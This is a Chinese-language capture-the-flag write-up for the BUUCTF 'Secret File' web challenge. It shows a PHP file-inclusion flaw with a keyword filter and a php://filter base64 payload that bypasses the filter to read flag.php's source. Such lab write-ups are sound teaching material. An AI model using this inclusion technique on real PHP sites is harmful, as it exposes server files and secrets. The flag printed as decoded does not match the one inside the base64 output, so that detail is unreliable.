BUUCTF WEB [极客大挑战 2019]Secret File
- 启动后效果如下
-
F12查看源代码
<!DOCTYPE html> <html> <style type="text/css" > #master { position:absolute; left:44%; bottom:0; text-align :center; } p,h1 { cursor: default; } </style> <head> <meta charset="utf-8"> <title>蒋璐源的秘密</title> </head> <body style="background-color:black;"><br><br><br><br><br><br> <h1 style="font-family:verdana;color:red;text-align:center;">你想知道蒋璐源的秘密么?</h1><br><br><br> <p style="font-family:arial;color:red;font-size:20px;text-align:center;">想要的话可以给你,去找吧!把一切都放在那里了!</p> <a id="master" href="./Archive_room.php" style="background-color:#000000;height:70px;width:200px;color:black;left:44%;cursor:default;">Oh! You found me</a> <div style="position: absolute;bottom: 0;width: 99%;"><p align="center" style="font:italic 15px Georgia,serif;color:white;"> Syclover @ cl4y</p></div> </body> </html>
其中一段代码包含一个跳转链接
<a id="master" href="./Archive_room.php" style="background-color:#000000;height:70px;width:200px;color:black;left:44%;cursor:default;">Oh! You found me</a>
-
尝试访问Archive_room.php
- 点击SECRET按钮后自动跳转到end.php中
-
使用BurpSuite抓包,得知中间会访问action.php。放入Repeater中发送请求包
GET /action.php HTTP/1.1 Host: b1dd1aed-6389-452a-8c8e-8f0363d3f057.node4.buuoj.cn:81 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://b1dd1aed-6389-452a-8c8e-8f0363d3f057.node4.buuoj.cn:81/Archive_room.php Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close
得到响应包如下
HTTP/1.1 302 Found Server: openresty Date: Sat, 09 Apr 2022 02:40:03 GMT Content-Type: text/html; charset=UTF-8 Connection: close Location: end.php X-Powered-By: PHP/7.3.11 Content-Length: 63 <!DOCTYPE html> <html> <!-- secr3t.php --> </html>
-
访问secr3t.php
<html> <title>secret</title> <meta charset="UTF-8"> <?php highlight_file(__FILE__); error_reporting(0); $file=$_GET['file']; if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){ echo "Oh no!"; exit(); } include($file); //flag放在了flag.php里 ?> </html>
可以看出这是一个文件包含漏洞
关于过滤
<?php
highlight_file(__FILE__);
error_reporting(0);
$file=$_GET['file'];
if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
echo "Oh no!";
exit();
}
include($file);
//flag放在了flag.php里
?>
-
strstr
函数strstr(string $haystack, mixed $needle, bool $before_needle = false): string
用于查找字符串的首次出现, 返回
haystack
字符串从needle
第一次出现的位置开始到haystack
结尾的字符串。区分大小写
-
stristr
函数stristr(string $haystack, mixed $needle, bool $before_needle = false): string
作用同
strstr
,忽略大小。
可见代码过滤了$file
变量中的../ tp input data
等敏感字符串,其中input data
均是用于文件包含漏洞PHP伪协议的关键字。
可以利用filter
伪协议进行文件包含读取flag.php文件中的内容
构造payload/secr3t.php?file=php://filter/read=convert.base64-encode/resource=flag.php
得到base64编码的文件内容:
PCFET0NUWVBFIGh0bWw+Cgo8aHRtbD4KCiAgICA8aGVhZD4KICAgICAgICA8bWV0YSBjaGFyc2V0PSJ1dGYtOCI+CiAgICAgICAgPHRpdGxlPkZMQUc8L3RpdGxlPgogICAgPC9oZWFkPgoKICAgIDxib2R5IHN0eWxlPSJiYWNrZ3JvdW5kLWNvbG9yOmJsYWNrOyI+PGJyPjxicj48YnI+PGJyPjxicj48YnI+CiAgICAgICAgCiAgICAgICAgPGgxIHN0eWxlPSJmb250LWZhbWlseTp2ZXJkYW5hO2NvbG9yOnJlZDt0ZXh0LWFsaWduOmNlbnRlcjsiPuWViuWTiO+8geS9oOaJvuWIsOaIkeS6hu+8geWPr+aYr+S9oOeci+S4jeWIsOaIkVFBUX5+fjwvaDE+PGJyPjxicj48YnI+CiAgICAgICAgCiAgICAgICAgPHAgc3R5bGU9ImZvbnQtZmFtaWx5OmFyaWFsO2NvbG9yOnJlZDtmb250LXNpemU6MjBweDt0ZXh0LWFsaWduOmNlbnRlcjsiPgogICAgICAgICAgICA8P3BocAogICAgICAgICAgICAgICAgZWNobyAi5oiR5bCx5Zyo6L+Z6YeMIjsKICAgICAgICAgICAgICAgICRmbGFnID0gJ2ZsYWd7MmZkNzFiODAtYzFmMi00YzdjLWI4YmMtNjQ2NWY5NDg3MWZlfSc7CiAgICAgICAgICAgICAgICAkc2VjcmV0ID0gJ2ppQW5nX0x1eXVhbl93NG50c19hX2cxcklmcmkzbmQnCiAgICAgICAgICAgID8+CiAgICAgICAgPC9wPgogICAgPC9ib2R5PgoKPC9odG1sPgo=
解密后得到flag
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>FLAG</title>
</head>
<body style="background-color:black;"><br><br><br><br><br><br>
<h1 style="font-family:verdana;color:red;text-align:center;">啊哈!你找到我了!可是你看不到我QAQ~~~</h1><br><br><br>
<p style="font-family:arial;color:red;font-size:20px;text-align:center;">
<?php
echo "我就在这里";
$flag = 'flag{3be9e2b1-0e53-48e4-987b-0aacef0c9547}';
$secret = 'jiAng_Luyuan_w4nts_a_g1rIfri3nd'
?>
</p>
</body>
</html>